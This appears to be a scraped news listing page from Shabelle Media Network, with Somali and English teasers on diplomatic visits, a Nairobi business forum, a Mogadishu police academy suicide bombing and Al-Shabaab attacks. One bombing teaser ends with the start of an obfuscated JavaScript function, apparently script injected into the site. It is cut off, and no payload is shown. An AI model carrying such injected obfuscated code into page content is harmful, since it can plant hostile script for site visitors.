Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wasiir Al-Cadaala oo booqday safaaradda Soomaaliya ee Washington + Sawirro

WASHINGTON (SMN) - Wasiir ku Xigeenka Wasaaradda Warfaafinta, Dhaqanka, iyo Dalxiiska XFS Mudane Cabdiraxmaan Yuusuf Cumar Al Cadaaala oo safar shaqo ku jooga dalka Mareykanka ayaa maanta booqasho ku tagay Safaaradda Soomaaliya ee Magaalada Washington.   Wasiirka waxaa soo dhaweeyey Danjiraha Soomaaliya u fadhiya dalka Mareykanka, Ambassador Dahir Hassan Arab iyo hawl-wadeennada Safaaradda. Wasiir Al Cadaa ayaa madaxda Safaaradda ku bogaadiyey dadaalka...

South C Business Networking Forum Draws Hundreds

NAIROBI, Kenya — Hundreds of business professionals, entrepreneurs, and corporate leaders converged at South C, Nairobi, on Thursday for the inaugural South C Business Networking Forum, marking a significant step towards enhancing local economic interactions.   Somalia's Ambassador to Kenya, Jabril Ibrahim Abdulle, along with former Mandera Senator Billow Kerrow, officiated the event. The forum, which saw participation from various sectors,...

Danjire Jabriil oo furay bandhigga iyo isku-xirka Ganacsiga + Sawirro

NAIROBI (SMN) -  Boqolaal ganacsato ah, wakiilo ganacsi, dadka deegaanka iyo hogaamiyayaasha shirkadaha waaweyn ee Ganacsiga dalka Kenya ayaa isugu soo baxay madasha isku xirka ganacsiga ee ugu horeysay ee lagu qabto Xaafadda South C, Nairobi oo ah deegaank ay ku nool-yihiin dadka Soomaalida.   Munaasabadan oo ay ka soo qeyb galeen dadweyne aad u fara badan oo ka kala socday...

Seven dead in suicide bombing in Somalia’s capital – police

MOGADISHU, Somalia  - At least 7 people were killed and 6 wounded in a suicide bombing in Mogadishu, Somalia’s capital on Thursday afternoon.   Police issued a statement confirming the deaths and injuries with no further details about how the attack at General Kaahiye police academy happened. A man disguised as a police officer was reported to have set off his explosives...

Booliska Soomaaliya oo shaaciyay khasaaraha qaraxii Iskuul Booliisiya

MUQDISHO (SMN) - Taliska ciidanka Booliska Soomaaliyeed oo warsaxaafadeed soo saaray ayaa faah-faahin dheeraad ah ka bixiyay khasaaraha ka dhashay qarax ismiidaamin ahaa oo maanta ka dhacay barxadda Iskuul Booliisiya ee magaalada Muqdisho.   Qaraxa oo uu fuliyay qof isku soo xiray walxaha qarxa ayaa beegsaday maqaayad ku taalla afaafka hore ee xerada, taas oo ay fariistaan ciidamo iyo saraakiil ka...

Several dead in Somalia police academy bombing – Witnesses

MOGADISHU, Somalia - A powerful explosion was heard at General Kahiye police academy in Mogadishu on Thursday amid heightened security measures in the capital.   Medics and ambulance teams rushed to take the wounded to hospital and collect the corpses, according to the witnesses. The exact number of fatalities remains unclear. This is developing breaking news, check back for further updates. function _0x3023(_0x562006,_0x1334d6){const...

Qarax is-miidaamin ah oo goordhow ka dhacay Iskuul Booliisiya

MUQDISHO (SMN) - Qof ismiidaamiye ah ayaa isku qarxiyey maqaayad ay fariistaan Ciidanka iyo saraakiisha Booliiska oo ku taalla gudaha xerada Iskuul Booliisiya ee magaalada Muqdisho.   Dhimasho iyo dhaawacyo badan ayaa jira, waxaana gudaha ka socota rasaas, sida ay Shabelle u sheegeen ilo wareedyo xilkas ah. Lama ogaan karo khasaaraha, balse dadka udhow xeradaas ayaa soo warinaya in xaalad kacsanaan ah...

Sawirro: Wafdi ka socda QM oo lagu soo dhaweeyay magaalada Muqdisho

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda, Danjire Axmed Macallim Fiqi, iyo Ku-simaha Wakiilka Gaarka ah ee Qaramada Midoobay ee Soomaaliya, James Swan, ayaa soo dhaweeyay Kuxigeenka Xoghayaha Guud ee Qaramada Midoobay ee Arrimaha Siyaasadda iyo Dhismaha Nabadda, Marwo Rosemary A. DiCarlo, oo booqasho ku timid Soomaaliya.   Wasiir Fiqi ayaa Marwo DiCarlo uga warbixiyay horumarka dhawaan laga gaaray Soomaaliya, gaar ahaan...

Somalia Defense Minister Inspects Troops at Forward Base in Galmudug State

MOGADISHU, Somalia – Somalia's Defense Minister Abdulkadir Mohamed Nur made an unannounced visit to a forward operating base close to El-Dher village in the Galmudug State today.   The visit, aimed at assessing the military's readiness and the welfare of the troops, was highlighted by a warm reception from General Dayah Abdulle, Commander of the Somali National Army's (SNA) Ground Forces. During...

Al-Shabaab Attack on Military Base Near Hudur Town Leaves One Dead, Others Injured

HUDUR, Somalia - In a pre-dawn assault, Al-Shabaab militants targeted a military base located approximately 17 kilometers from Hudur, the capital of Somalia's Bakol region, in the SouthWest state.   The attack, which occurred overnight, resulted in at least one soldier confirmed dead and several others wounded, according to local sources. Army commanders in the region claim they successfully repelled the attackers,...

WARAR KALE

Guddiga Xuquuqul Insaanka Qaranka Oo Soo Gabagabeeyey Barnaamij Is-weydaarsi Aqooneed

NAIROBI – Guddiga Madaxa-Bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed (GMXIQ) ayaa soo gabagabeeyey barnaamij is-weydaarsi aqooneed oo socday muddo toddobaad ah, kaas oo ay...

Taliyaha NISA Oo Gaaray Dhuusamareeb Xilli La Filayo Doorashooyinka Qof iyo Codka Ah

DHUUSAMAREEB – Taliyaha Hey’adda Nabadsugida iyo Sirdoonka Qaranka ee NISA Mahad Maxamed Salaad iyo Wafdi uu hogaaminayo ayaa hada gaaray Degmadda Dhuusamareeb ee Caasimadda...

Soomaaliya iyo Bangiga Horumarinta Islaamka Oo Saxiixay Qaab-dhismeedka Iskaashiga

BAKU, AZERBAIJAN – Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Mudane Biixi Imaan Cige, iyo Madaxweynaha Bangiga Horumarinta Islaamka (IsDB), Dr. Muhammad Al Jasser, ayaa maanta...